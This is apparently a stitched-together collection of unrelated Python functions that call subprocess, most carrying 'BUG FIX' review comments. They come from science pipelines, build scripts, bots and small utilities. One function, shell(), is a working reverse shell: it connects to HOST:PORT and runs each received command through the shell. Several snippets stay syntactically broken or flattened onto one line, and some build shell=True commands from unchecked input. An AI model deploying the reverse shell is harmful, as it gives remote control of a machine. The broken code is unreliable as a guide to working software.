def ExecutePass( self, output ): #Check inputs files are in place if os.path.exists(self._inputVolume) == False: return False if self._useMask==1: if os.path.exists(self._maskFileName) == False: return False if self._singleScale == 1: tmpCommand = "unu resample -i " + self._inputVolume + " -s x1 x1 x1 -k dgauss:" + str(self._maxScale) + ",3 -t float -o " + self._inputVolume subprocess( tmpCommand, shell=True) tmpCommand = "puller -sscp " + self._temporaryDirectory + " -cbst true " + self._volParams + " " + self._miscParams + " " + self._infoParams + " " + \ self._energyParams + " " + self._initParams + " " + self._reconKernelParams + " " + self._optimizerParams + " -o " + output + " -maxi " + str(self._iterations) if self._verbose == 1: print tmpCommand #TODO: (remove this line) subprocess.call( tmpCommand, shell=True ) #Trick to add scale value if self._singleScale == 1: tmpCommand = "unu head " + output + " | grep size | awk '{split($0,a,\" \"); print a[3]}'" tmpNP = subprocess.Popen( tmpCommand, shell=True, stdout=PIPE, stderr=PIPE ) NP = tmpNP.communicate()[0].rstrip('\n') tmpCommand = "echo \"0 0 0 " + str(self._maxScale) + "\" | unu pad -min 0 0 -max 3 " + NP + " -b mirror | unu 2op + - " + output + " -o " + output subprocess.call( tmpCommand, shell=True )
def kill_julius():
    """Kill every running julius process (best effort)."""
    try:
        # BUG FIX: `subprocess` is a module, not a callable, and a shell
        # pipeline like this one requires shell=True.
        subprocess.call("ps ax | grep julius | grep -v grep | awk '{print $1}' | xargs kill", shell=True)
    except Exception as e:
        # BUG FIX: concatenating str with an exception object raises TypeError.
        print('Juliusの終了に失敗しました :' + str(e))
def main(left_reads, right_reads, genome_index_dir, insert_size):
    """DNAnexus applet entry point: download the inputs, align with STAR,
    and upload the sorted BAM, returning it under key 'output_bam'."""
    left_reads = dxpy.DXFile(left_reads)
    right_reads = dxpy.DXFile(right_reads)
    genome_index_dir = dxpy.DXFile(genome_index_dir)

    dxpy.download_dxfile(left_reads.get_id(), 'left_reads.bam')
    dxpy.download_dxfile(right_reads.get_id(), 'right_reads.bam')
    dxpy.download_dxfile(genome_index_dir.get_id(), 'genomeDir.tar.gz')
    # BUG FIX: the subprocess module is not callable.
    subprocess.check_call(['tar', '-zxvf', 'genomeDir.tar.gz'])

    # BUG FIX: at this point left_reads is a DXFile object, not a string, so
    # .split() raised AttributeError; derive the sample name from the
    # platform file name instead.
    # NOTE(review): assumes the file is named "<sample>_..." as the original
    # split('_')[0] implied — confirm against the project naming scheme.
    sample_name = left_reads.describe()['name'].split('_')[0]

    star_cmd = ['STAR']
    options = ['--runThreadN', '16',
               '--genomeDir', "genome_index_dir",
               '--readFilesIn', "left_reads.bam", "right_reads.bam",
               # BUG FIX: argv entries must be strings.
               '--sjdbOverhang', str(insert_size),
               '--outSAMtype', 'BAM', 'SortedByCoordinate']
    star_cmd.extend(options)
    # BUG FIX: check_call given the whole command as ONE string (shell=False)
    # would try to execute that string as a single program name; pass the list.
    subprocess.check_call(star_cmd)

    output_name = '%s.out.bam' % sample_name
    os.rename('Aligned.sortedByCoord.out.bam', output_name)
    output_file = dxpy.upload_local_file(output_name)

    output = {}
    output['output_bam'] = output_file
    return output
def ExecutePass(self, output): #Check inputs files are in place if os.path.exists(self._inputVolume) == False: return False if self._useMask == 1: if os.path.exists(self._maskFileName) == False: return False if self._singleScale == 1: tmpCommand = "unu resample -i " + self._inputVolume + " -s x1 x1 x1 -k dgauss:" + str( self._maxScale) + ",3 -t float -o " + self._inputVolume subprocess(tmpCommand, shell=True) tmpCommand = "puller -sscp " + self._temporaryDirectory + " -cbst true " + self._volParams + " " + self._miscParams + " " + self._infoParams + " " + \ self._energyParams + " " + self._initParams + " " + self._reconKernelParams + " " + self._optimizerParams + " -o " + output + " -maxi " + str(self._iterations) if self._verbose == 1: print tmpCommand #TODO: (remove this line) subprocess.call(tmpCommand, shell=True) #Trick to add scale value if self._singleScale == 1: tmpCommand = "unu head " + output + " | grep size | awk '{split($0,a,\" \"); print a[3]}'" tmpNP = subprocess.Popen(tmpCommand, shell=True, stdout=PIPE, stderr=PIPE) NP = tmpNP.communicate()[0].rstrip('\n') tmpCommand = "echo \"0 0 0 " + str( self._maxScale ) + "\" | unu pad -min 0 0 -max 3 " + NP + " -b mirror | unu 2op + - " + output + " -o " + output subprocess.call(tmpCommand, shell=True)
def seq2avi(seqPath, aviPath):
    """Convert every non-calibration .seq file under seqPath to .avi via clexport."""
    # BUG FIX: the original globbed an undefined name `path` (NameError), and
    # the initial os.listdir() result was dead code (immediately overwritten).
    seqFiles = list(set(glob(seqPath + '*.seq')) - set(glob(seqPath + '*calib*.seq')))
    for seqFile in seqFiles:
        fileAVI = os.path.splitext(os.path.split(seqFile)[1])[0] + '.avi'
        # BUG FIX: the subprocess module is not callable; use subprocess.call.
        subprocess.call([
            'clexport', '-i', seqFile, '-f', 'avi', '-cv', '0',
            '-o', aviPath, '-ofs', fileAVI
        ])
def createFile():
    """Create /etc/config/data (mode 775) and write the connection settings into it.

    NOTE(review): ip, name_wifi, start_list and max_pool are module-level
    names defined elsewhere in this file — confirm they are set before this
    is called.
    """
    # BUG FIX: the subprocess module is not callable.
    subprocess.call(["touch", "/etc/config/data"])
    # BUG FIX: chmod was given the bare name "data", which resolves relative
    # to the current working directory, not the file just created.
    subprocess.call(["chmod", "775", "/etc/config/data"])
    # `with` guarantees the close the original's try/finally was emulating.
    with open("/etc/config/data", 'w') as f:
        print(f.write(ip + "\n"))
        print(f.write(name_wifi + "\n"))
        print(f.write(start_list[3] + "\n"))
        print(f.write(max_pool))
    return True
def openFile(self, filePath):
    """Open filePath with the platform's spreadsheet/default opener."""
    import platform, subprocess, os
    if platform.system() == "Linux":
        subprocess.Popen([config.open, filePath])
    elif platform.system() == "Windows":
        # BUG FIX: the subprocess module is not callable; Popen keeps the
        # original fire-and-forget behaviour. Try Excel first, then the
        # shell's default association.
        try:
            subprocess.Popen("excel.exe {0}".format(filePath), shell=True)
        except Exception:
            try:
                subprocess.Popen("start {0}".format(filePath), shell=True)
            except Exception:
                pass
    else:
        os.system("{0} {1}".format(config.open, filePath))
def createavatar(username):
    """Create and save a default identicon avatar for `username`.

    Returns the path the avatar was saved to.
    """
    avatar = Avatar(rows=10, columns=10)
    image_byte_array = avatar.get_image(string=username, width=400, height=400, pad=10)
    loc = "/static/avatars/" + username
    # BUG FIX: the subprocess module is not callable; -p also makes the call
    # idempotent when the directory already exists.
    subprocess.call(["mkdir", "-p", loc])
    save_location = "/static/avatars/" + username + "/default.png"
    avatar.save(image_byte_array=image_byte_array, save_location=save_location)
    return save_location
def zip(): ''' >>> #subprocess('make zip') ''' ret = subprocess('make zip') print ret[1]
def prepare_videos(self):
    """Run the external C3D feature-extraction script and print its stdout."""
    print("preparing videos.......")
    # BUG FIX: the subprocess module is not callable; Popen is required
    # because .communicate() is used below.
    result = subprocess.Popen(
        ['python', '/home/callbarian/C3D/C3D-v1.0/examples/c3d_feature_extraction/run_feature_extraction.py'],
        stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    out = result.communicate()
    print(out[0])
def upload_archive(exp_name, archive_excludes, s3_bucket):
    """Tar this package, upload the archive to S3 and return a pre-signed URL.

    The archive name embeds a sha224 of its contents so repeated uploads of
    identical code are idempotent.
    """
    # BUG FIX: `os` itself was never imported (only os.path as osp), yet
    # os.environ is used in the darwin branch below.
    import hashlib, os, os.path as osp, subprocess, tempfile, uuid, sys

    # Archive this package
    thisfile_dir = osp.dirname(osp.abspath(__file__))
    pkg_parent_dir = osp.abspath(osp.join(thisfile_dir, '..', '..'))
    pkg_subdir = osp.basename(osp.abspath(osp.join(thisfile_dir, '..')))
    assert osp.abspath(__file__) == osp.join(pkg_parent_dir, pkg_subdir, "scripts", "rl_launch.py")

    # run tar
    tmpdir = tempfile.TemporaryDirectory()
    # BUG FIX: uuid.uuid4 was never called, so the function's repr ended up
    # in the file name instead of a fresh UUID.
    local_archive_path = osp.join(tmpdir.name, '{}.tar.gz'.format(uuid.uuid4()))
    tar_cmd = ["tar", "-zcvf", local_archive_path, "-C", pkg_parent_dir]
    for pattern in archive_excludes:
        tar_cmd += ['--exclude', pattern]
    tar_cmd += ["-h", pkg_subdir]
    print(tar_cmd)

    if sys.platform == 'darwin':
        # Prevent Mac tar from adding ._* files
        env = os.environ.copy()
        env['COPYFILE_DISABLE'] = '1'
        subprocess.check_call(tar_cmd, env=env)
    else:
        # BUG FIX: the subprocess module is not callable.
        subprocess.check_call(tar_cmd)

    # Construct remote path to place the archive on S3
    with open(local_archive_path, 'rb') as f:
        archive_hash = hashlib.sha224(f.read()).hexdigest()
    remote_archive_path = '{}/{}_{}.tar.gz'.format(s3_bucket.strip(), exp_name.strip(), archive_hash.strip())

    # Upload
    upload_cmd = ["aws", "s3", "cp", local_archive_path, remote_archive_path]
    highlight(" ".join(upload_cmd))
    subprocess.check_call(upload_cmd)

    presign_cmd = [
        "aws", "s3", "presign", remote_archive_path,
        "--expires-in", str(60 * 60 * 24 * 30)
    ]
    highlight(" ".join(presign_cmd))
    remote_url = subprocess.check_output(presign_cmd).decode("utf-8").strip()
    return remote_url
def run(comment):
    """Get team composition and report with what the team is strongest in."""
    request = comment.strip().split("!oldteamsummary")[1].strip()
    while request.endswith(","):
        request = request[:-1].strip()
    response = ""
    # User has listed heroes and not a Dotabuff URL
    if "," in request:
        heroes = request.split(",")
        if len(heroes) > 5:
            return
        new_team_data = construct_response(heroes)
        for role, rating in new_team_data.items():
            response += ("" + role + ": **" + str(rating) + "**\n\n")
    elif (request.startswith("http://www.dotabuff.com/matches/")
          or request.startswith("www.dotabuff.com/matches/")
          or request.startswith("dotabuff.com/matches/")):
        # BUG FIX: the subprocess module is not callable; check_output
        # captures the page body the way the commented-out
        # commands.getstatusoutput call used to.
        output = subprocess.check_output(["curl", "-s", request])
        soup = BeautifulSoup(output, "html.parser")
        radi_heroes = []
        dire_heroes = []
        # First five hero icons are Radiant, next five Dire.
        for hero in soup.find_all("div", {"class": "image-container image-container-hero image-container-icon"}):
            hero = str(hero.find("a"))
            hero = hero[17:hero.find("\"><img class=\"image-hero image-icon")]
            if len(radi_heroes) < 5:
                radi_heroes.append(better_string(hero))
            elif len(dire_heroes) < 5:
                dire_heroes.append(better_string(hero))
            else:
                break
        radi_data = construct_response(radi_heroes)
        dire_data = construct_response(dire_heroes)
        response += ("#**Radiant:**\n\n")
        for role, rating in radi_data.items():
            response += ("" + role + ": **" + str(rating) + "**\n\n")
        response += ("\n\n#**Dire:**\n\n")
        for role, rating in dire_data.items():
            response += ("" + role + ": **" + str(rating) + "**\n\n")
    else:
        return
    return response
def nikto_help(target):
    """Print nikto's -H help text, then rebuild the previous menu."""
    from core.build_menu import buildmenu
    # BUG FIX: the subprocess module is not callable; the original also
    # pointlessly rebound the function's own name to the result.
    subprocess.call('nikto -H', shell=True)
    print(" " + color.custom('[B] Back', bold=True, white=True, bg_red=True) + '\n')
    buildmenu(target, target[0].last_menu, '', '')
def __init__(self):
    """Start a logcat pipe filtered to UploadService upload lines."""
    self.get_devices_Info()
    #self.clear_log()
    # BUG FIX: the subprocess module is not callable; Popen provides the
    # stdout pipe the rest of the class reads from.
    # TODO(review): the '%s' device-serial placeholder is never interpolated —
    # confirm which serial from get_devices_Info() belongs here.
    self.cmd_sys = subprocess.Popen(
        'adb -s %s logcat | grep "UploadService".*"upload"',
        shell=True, stdout=subprocess.PIPE, bufsize=1, stderr=subprocess.STDOUT)
def shell():
    """Connect back to HOST:PORT and run each received line, sending stdout back.

    NOTE(review): this executes remote input through the shell by design
    (reverse-shell tool); do not deploy outside a controlled environment.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    s.send('[*] Connection Established!')
    while 1:
        data = s.recv(1024)
        if data == "quit":
            break
        # BUG FIX: the subprocess module is not callable; Popen is needed
        # for .communicate().
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        STDOUT, STDERR = proc.communicate()
        s.send(STDOUT)
    s.close()
def eval_model(model_pth, test_dir, submit_path, NMS_choice='lanms'):
    """Run detection over test_dir, zip the per-image txts and score them
    with the ICDAR evaluation script."""
    if os.path.exists(submit_path):
        shutil.rmtree(submit_path)
    os.mkdir(submit_path)
    device = ("cuda:2" if torch.cuda.is_available() else "cpu")
    checkpoint = torch.load(model_pth)
    model = PixelAnchornet(pretrained=False).to(device)
    model.load_state_dict(checkpoint)
    start_time = time.time()
    detect_dataset(model, device, test_dir, submit_path, NMS_choice=NMS_choice)
    os.chdir(submit_path)
    # BUG FIX: a single command string (with a '*' glob, no less) requires
    # shell=True; without it call() looks for a program literally named
    # 'zip -q submit.zip *.txt'.
    subprocess.call('zip -q submit.zip *.txt', shell=True)
    subprocess.call('mv submit.zip ../', shell=True)
    os.chdir('../')
    # BUG FIX: the subprocess module is not callable, and the original used
    # en-dash characters ('–g', '–s') instead of ASCII '-' option dashes.
    subprocess.call('python ./evaluate/script.py -g=./evaluate/gt.zip -s=./submit.zip', shell=True)
    os.remove('./submit.zip')
    print('eval time is {}'.format(time.time() - start_time))
def prep(cfg):
    """Stage a sample's FASTQ files into a fresh <runname>.<samplename> read-set dir."""
    # get parameter settings
    (runpath, runname, samplename, speSide, r1universal, r2universal,
     umiLen, umiOffset, panelId, platform) = cfg

    # read set related preprocessing
    readSet = runname + "." + samplename
    samplepath = runpath + "/" + runname
    if not os.path.exists(samplepath):
        samplepath = runpath
    subprocess.check_call("mkdir -p " + readSet, shell=True)

    if platform == "2":
        # BUG FIX: the original referenced an undefined `readset` (case typo)
        # and called the subprocess module directly.
        cmd = "mv " + samplepath + "/" + samplename + "*.fastq " + readSet + "/" + samplename + ".fastq"
        subprocess.check_call(cmd, shell=True)
        makePair(readSet + "/" + samplename + ".fastq", speSide)
    else:
        fastq1 = samplepath + "/" + samplename + "*_R1*.fastq"
        fastq2 = samplepath + "/" + samplename + "*_R2*.fastq"
        # Move either the plain or the gzipped variant, whichever exists.
        cmd1 = "if [ -e " + fastq1 + " ]; then mv " + fastq1 + " " + readSet + "/" + samplename + "_R1.fastq; else mv " + fastq1 + ".gz " + readSet + "/" + samplename + "_R1.fastq.gz; fi"
        cmd2 = "if [ -e " + fastq2 + " ]; then mv " + fastq2 + " " + readSet + "/" + samplename + "_R2.fastq; else mv " + fastq2 + ".gz " + readSet + "/" + samplename + "_R2.fastq.gz; fi"
        subprocess.check_call(cmd1, shell=True)
        subprocess.check_call(cmd2, shell=True)
def dencode():
    """Unpack FILE into a <FILE>_paths_unpack directory and report the result.

    NOTE(review): FILE is a module-level name defined elsewhere in this file.
    """
    # BUG FIX: call() took 'color 0f' as its (invalid) second positional
    # argument; a shell command string needs shell=True.
    subprocess.call('cls', shell=True)
    try:
        # BUG FIX: the original applied '%' to the *return value* of a
        # (broken) module call and mixed '{}' placeholders with '%'
        # formatting; format the command first, then run it.
        makeFile = 'mkdir {}_paths_unpack'.format(FILE)
        subprocess.call(makeFile, shell=True)
        lbSucess = "[++] dencode com sucesso!\n[#] {} foi salvo como {} na sua desktop!".format(FILE, makeFile)
        print(lbSucess)
    except Exception as e:
        # BUG FIX: the original printed an undefined `lbError` name.
        print('[--] dencode falhou: {}'.format(e))
def CheckSaturation(mod):
    """Return 0 when the energy curve of module `mod` has stopped growing
    (more than one non-positive gradient sample), 1 otherwise.

    Reads 'EnergyFile.mdl' from the current directory.
    """
    case = Case()
    case.time, case.mod, case.energy = np.loadtxt(
        'EnergyFile.mdl', comments="\x00", skiprows=1, usecols=(0, 1, 2), unpack=True)
    e0 = case.energy[(case.mod == mod)]
    y1 = np.gradient(e0, 2)
    y2 = np.where(y1 <= 0)
    if len(y2[0]) > 1:
        return 0
    return 1


# Module-level PBS job preparation.
# NOTE(review): `name` and `path` must be defined earlier in this file for
# this to run — confirm.
os.chdir('/home/nyadav/pbs')
f1 = open('/home/nyadav/pbs/jobBezmpi.sh', 'r')
d = f1.readlines()
d[2] = '#PBS -N ' + name
d[6] = 'cd ' + path
f1.close()
# subprocess('rm /home/nyadav/pbs/jobBezmpi.sh',shell=True);
f1 = open('/home/nyadav/pbs/abc.sh', 'w')
f1.writelines(d)
f1.close()
# BUG FIX: adjacent string literals concatenate, so the original tried to run
# the single word "chmodu+x/home/nyadav/pbs/abc.sh"; the subprocess module is
# also not callable.
subprocess.call("chmod u+x /home/nyadav/pbs/abc.sh", shell=True)
def generatePublisherPolicyConfig(env, target, source):
    """this method assumes that source list corresponds to
    [0]=version, [1]=assembly base name, [2]=assembly file node"""
    # call strong name tool against compiled assembly and parse output for public token
    outputFolder = os.path.split(target[0].tpath)[0]
    pubpolicy = os.path.join(outputFolder, source[2].name)
    # BUG FIX: the subprocess module is not callable and never returned an
    # (rv, data, err) tuple; run sn via Popen and capture its output.
    proc = subprocess.Popen("sn -T " + pubpolicy, shell=True,
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                            universal_newlines=True)
    data, err = proc.communicate()
    rv = proc.returncode
    import re
    # the public key token is the trailing 16 hex chars of sn's output
    tok_re = re.compile(r"([a-z0-9]{16})[\r\n ]{0,3}$")
    match = tok_re.search(data)
    tok = match.group(1)
    # calculate version range to redirect from
    version = source[0].value
    oldVersionStartRange = "%s.%s.0.0" % (version[0], version[1])
    newVersion = "%s.%s.%s.%s" % (version[0], version[1], version[2], version[3])
    build = int(version[2])
    rev = int(version[3])
    # on build 0 and rev 0 or 1, no range is needed. otherwise calculate range
    if build == 0 and (rev == 0 or rev == 1):
        oldVersionRange = oldVersionStartRange
    else:
        if rev == 0:
            endRevisionRange = "0"
            endBuildRange = str(build - 1)
        else:
            endRevisionRange = str(rev - 1)
            endBuildRange = str(build)
        oldVersionEndRange = "%s.%s.%s.%s" % (
            version[0], version[1], endBuildRange, endRevisionRange,
        )
        oldVersionRange = "%s-%s" % (oldVersionStartRange, oldVersionEndRange)
    # write .net config xml out to file
    with open(target[0].path, "w") as out:
        out.write("""\
<configuration><runtime><assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<dependentAssembly>
<assemblyIdentity name="%s" publicKeyToken="%s"/>
<bindingRedirect oldVersion="%s" newVersion="%s"/>
</dependentAssembly>
</assemblyBinding></runtime></configuration>
""" % (source[1].value, tok, oldVersionRange, newVersion))
def generatePublisherPolicyConfig(env, target, source):
    """this method assumes that source list corresponds to
    [0]=version, [1]=assembly base name, [2]=assembly file node"""
    # call strong name tool against compiled assembly and parse output for public token
    outputFolder = os.path.split(target[0].tpath)[0]
    pubpolicy = os.path.join(outputFolder, source[2].name)
    # BUG FIX: the subprocess module is not callable and never returned an
    # (rv, data, err) tuple; run sn via Popen and capture its output.
    proc = subprocess.Popen("sn -T " + pubpolicy, shell=True,
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                            universal_newlines=True)
    data, err = proc.communicate()
    rv = proc.returncode
    import re
    # the public key token is the trailing 16 hex chars of sn's output
    tok_re = re.compile(r"([a-z0-9]{16})[\r\n ]{0,3}$")
    match = tok_re.search(data)
    tok = match.group(1)
    # calculate version range to redirect from
    version = source[0].value
    oldVersionStartRange = "%s.%s.0.0" % (version[0], version[1])
    newVersion = "%s.%s.%s.%s" % (version[0], version[1], version[2], version[3])
    build = int(version[2])
    rev = int(version[3])
    # on build 0 and rev 0 or 1, no range is needed. otherwise calculate range
    if build == 0 and (rev == 0 or rev == 1):
        oldVersionRange = oldVersionStartRange
    else:
        if rev - 1 < 0:
            endRevisionRange = "99"
            endBuildRange = str(build - 1)
        else:
            endRevisionRange = str(rev - 1)
            endBuildRange = str(build)
        oldVersionEndRange = "%s.%s.%s.%s" % (version[0], version[1], endBuildRange, endRevisionRange)
        oldVersionRange = "%s-%s" % (oldVersionStartRange, oldVersionEndRange)
    # write .net config xml out to file; `with` guarantees the close()
    with open(target[0].path, "w") as out:
        out.write(
            """\
<configuration><runtime><assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<dependentAssembly>
<assemblyIdentity name="%s" publicKeyToken="%s"/>
<bindingRedirect oldVersion="%s" newVersion="%s"/>
</dependentAssembly>
</assemblyBinding></runtime></configuration>
""" % (source[1].value, tok, oldVersionRange, newVersion)
        )
def get_uptime(self):
    """Return system uptime formatted as 'D days H hours M minutes S seconds'."""
    # BUG FIX: the subprocess module is neither callable nor a context
    # manager. The "float seconds in the first field" format parsed below is
    # that of /proc/uptime (not of the uptime(1) command), so read the file
    # directly.
    with open('/proc/uptime') as f:
        total_seconds = float(f.read().split()[0])

    MINUTE = 60
    HOUR = MINUTE * 60
    DAY = HOUR * 24
    days = int(total_seconds / DAY)
    hours = int((total_seconds % DAY) / HOUR)
    minutes = int((total_seconds % HOUR) / MINUTE)
    seconds = int(total_seconds % MINUTE)
    uptime = "{0} days {1} hours {2} minutes {3} seconds".format(days, hours, minutes, seconds)
    return uptime
def find_gcov(self, dir):
    """Walk `dir` for .gcno coverage files and dispatch each to the
    matching CSV writer (gcov_csv when .gcda data exists, file_csv otherwise)."""
    # BUG FIX: the subprocess module is not callable; Popen provides .stdout.
    find = subprocess.Popen(["find", dir, "-name", "*.gcno"], stdout=subprocess.PIPE)
    for rec in iter(find.stdout.readline, b''):
        gcno = rec.strip()
        path = gcno[0:-5]  # strip the ".gcno" suffix
        gcda = path + ".gcda"
        file = ""
        for ext in [".c", ".cc", ".cpp"]:
            if os.path.exists(path + ext):
                file = path + ext
                break
        self.debug("find_gcno: gcno=[%s] gcda=[%s] file=[%s]" % (gcno, gcda, file))
        # BUG FIX: os.patyh -> os.path (NameError on first .gcda hit).
        if os.path.exists(gcda):
            if file == "":
                file = path + ".o"
            self.gcov_csv(file)
        elif file:
            self.file_csv(file)
def run( self ):
    # Drive a full Herwig7 event generation: build the runcard, integrate,
    # then generate events in a fresh per-seed folder, capturing each
    # stage's console output to a *-std log file.
    #
    # NOTE(review): `subprocess` is called with onscreen=/fname= keyword
    # arguments, which the standard-library module does not accept — this
    # appears to be a project-local wrapper imported elsewhere in the file;
    # confirm before "fixing" it to subprocess.call.
    # make sure full path is available
    self.path = os.path.abspath( self.path )
    # start herwig run
    print "--h7[%i]: working on '%s'" % (os.getpid(),self.path)
    # create directory
    mkdir( self.path )
    # create runcard
    print "--h7[%i]: runcard" % os.getpid()
    self.card()
    # build
    print "--h7[%i]: build" % os.getpid()
    args = [ 'hepstore-herwig', '--docker_verbose', '--docker_directory', self.path, 'build', '%s.in' % self.name ]
    subprocess( args, onscreen=False, fname=os.path.join(self.path,'build-std') )
    # integrate
    print "--h7[%i]: integrate" % os.getpid()
    args = [ 'hepstore-herwig', '--docker_verbose', '--docker_directory', self.path, 'integrate', '%s.run' % self.name, ]
    subprocess( args, onscreen=False, fname=os.path.join(self.path,'integrate-std') )
    # find a clean generation folder
    self.next()
    mkdir( os.path.join( self.path, self.folder))
    # hard-link the shared scratch area and run file into the fresh folder
    os.link( os.path.abspath( os.path.join(self.path,'Herwig-scratch') ), os.path.abspath( os.path.join(self.path,self.folder,'Herwig-scratch') ) )
    os.link( os.path.abspath( os.path.join(self.path,'%s.run' % self.name) ), os.path.abspath( os.path.join(self.path,self.folder,'%s.run' % self.name) ) )
    # run
    print "--h7[%i]: run" % os.getpid()
    args = [ 'hepstore-herwig', '--docker_verbose', '--docker_directory', os.path.join(self.path,self.folder), 'run' , '%s.run' % self.name, '-N', '%i' % self.options.nevents, '-s', '%i' % self.seed ]
    subprocess( args, onscreen=False, fname=os.path.join(self.path,self.folder,'run-std') )
    # return the path to the hepmc file
    self.hepmc_dir = os.path.join( self.path, self.folder )
    pass
if (answer == "1"): data = input("DATA FILE NAME:\n ") new_file = input("WHAT WOULD YOU LIKE TO NAME THE NEWLY ENCRYPTED FILE?\n ") pubkey = input("RECIPIENTS PUBLIC KEY:\n ") subprocess.run(["openssl", "rand","-out", "randompass.txt", "-base64", "120"]) subprocess.run(["openssl", "enc", "-aes-256-cbc", "-salt", "-in", data, "-out", new_file, "-pass", "file:randompass.txt"]) 0 subprocess.run(["openssl", "rsautl","-encrypt", "-in", "randompass.txt", "-out" , "randompass.enc", "-pubin", "-inkey", pubkey]) subprocess(['rm', randompass.txt]) subprocess(['rm', data]) suborocess(['mv', new_file, '/media/vault']) # Decryption elif (answer == "2"): privkey = input("ENTER YOUR PRIVATE KEY:\n ") file_name = input("ENTER THE NAME OF THE ENCRYPTED FILE:\n ") data = input("NAME THE NEW FILE:\n ")
def addpkg(package, version=DEF_VERSION, pkg_path=DEF_PKG_PATH):
    """Install `package` with pkg_add and assert that it succeeded.

    NOTE(review): pkg_path is computed but never passed to pkg_add —
    presumably it should feed PKG_PATH; confirm intended behaviour.
    """
    pkg_path = os.path.join(pkg_path, version, 'packages')
    # BUG FIX: the subprocess module is not callable; Popen provides
    # .wait() and .returncode used below.
    proc = subprocess.Popen(['pkg_add', package])
    proc.wait()
    assert proc.returncode == 0
elif cmd[0] == "ls" and len(cmd) == 1: ls() elif cmd[0] == "ls" and len(cmd) == 2: ls2(cmd) elif cmd[0] == "rm": rm(cmd) elif len(cmd) == 3 and cmd[0] == "cp": cp(cmd) elif len(cmd) == 2 and cmd[0] == "cd": cd(cmd) elif len(cmd) == 2 and cmd[0] == "wc": fname = cmd[1] option = 0 wc(cmd, fname, option) elif len(cmd) == 3 and cmd[0] == "wc": option = cmd[1] fname = cmd[2] wc(cmd, fname, option) elif cmd[0] == "mv": mv(cmd) elif cmd[0] == "pwd": pwd() elif cmd[0] == "mkdir": mkdir(cmd) elif cmd[0] == "rmdir": rmdir(cmd) elif cmd[0] == "touch": touch(cmd) else: subprocess(cmd)
def start_process():
    """(Re)start the managed child process, inheriting our stdio streams."""
    global process, command
    log('Start process %s...' % ' '.join(command))
    # BUG FIX: the subprocess module is not callable; Popen starts the child.
    process = subprocess.Popen(command, stdin=sys.stdin, stdout=sys.stdout, stderr=sys.stderr)
"--outFileFormat", "bigwig", "-p", pthread, "--normalizeUsing", "CPM", "--binSize", "1" ] print("\t$", " ".join(cmd8_args)) print(run_timed(cmd8_args)) ######## VERSIONS ############# print("\n>>> VERSIONS:") print("\n>>> FASEQC VERSION:") print(subprocess.run(["fastqc", "--version"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)) print("\n>>> HISAT2 VERSION:") print(subprocess.run(["hisat2", "--version"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)) print("\n>>> SAMTOOLS VERSION:") print(subprocess.run(["samtools", "--version"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)) print("\n>>> HTSEQ-COUNT VERSION:") output = subprocess.run(['htseq-count', '--help'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) for line in output.stdout: if line.find("version") >= 0: print(line.strip() break print("\n>>> BAMCOVERAGE VERSION:") print(subprocess(["bamCoverage", "--version"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)) print(">>> END: Analayzer complete.")
def install_vim_ult():
    """Clone amix/vimrc into ~/.vim_runtime and run its installer script."""
    runtime_dir = os.path.join(user_home, '.vim_runtime')
    subprocess.run(['git', 'clone', '--depth=1', 'https://github.com/amix/vimrc.git', runtime_dir])
    # BUG FIX: the subprocess module is not callable.
    subprocess.run(['sh', runtime_dir + '/install_awesome_vimrc.sh'])
def upload_file(filename):
    """Invoke the ftp client on `filename`, capturing its combined output."""
    cmdlist = ['ftp', filename]
    # BUG FIX: the subprocess module is not callable; Popen provides
    # .communicate().
    p = subprocess.Popen(cmdlist, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    output, _ = p.communicate()
def fetch_all(self):
    """Fetch all remotes of the repository at self.repo_dir.

    Raises CalledProcessError if git fails, instead of silently ignoring it.
    """
    cmd = 'git fetch --all'
    # BUG FIX: the subprocess module is not callable.
    subprocess.check_call(shlex.split(cmd), cwd=self.repo_dir)
for fasta in rec_dict[strain]: concat_dict[strain]=concat_dict[strain]+str(fasta.seq) #write out concatenated fasta handle=open("all_concat.fasta", "w") for rec in concat_dict: handle.write(">"+rec+"\n"+concat_dict[rec]+"\n") handle.close() #SeqIO.write(list(SeqIO.parse(open("all_concat.fasta"), "fasta")), "all_concat.phy", "phylip") #now write out tree for node in tree_old.traverse(): if node.is_leaf(): temp=node.name.replace('p','plate') node.name=temp tree_old.prune(strains, preserve_branch_length=T) write.tree(tree_old, "all_concat.newick", formatrue=1) for leaf in collapsed.get_leaves(): temp=leaf.name.replace('p', 'plate').split("_")[0] leaf.name=temp collapsed.write(outfile="concat_107.newick", format=1) test=subprocess(Popen(["/ebio/abt6_projects9/Pseudomonas_diversity/Programs/bin/ClonalFrameML", "/ebio/abt6_projects9/Pseudomonas_diversity/data/post_assembly_analysis/pan_genome/data/vis/clonalframe/concat_107.newick", "/ebio/abt6_projects9/Pseudomonas_diversity/data/post_assembly_analysis/pan_genome/data/vis/clonalframe/all_concat.fasta"]), stdout=subprocess.PIPE)) output = test.communicate()[0]
def run_maker(filename):
    """Run MAKER on `filename` using the prebuilt control files.

    NOTE(review): tmp_opts is a module-level name defined elsewhere in this file.
    """
    maker_command_string = "maker -g " + filename + " " + tmp_opts + " maker_bopots.ctl maker_exe.ctl"
    # BUG FIX: the original passed an undefined name (`maker_string`) and
    # called the subprocess module directly.
    subprocess.call(maker_command_string, shell=True)
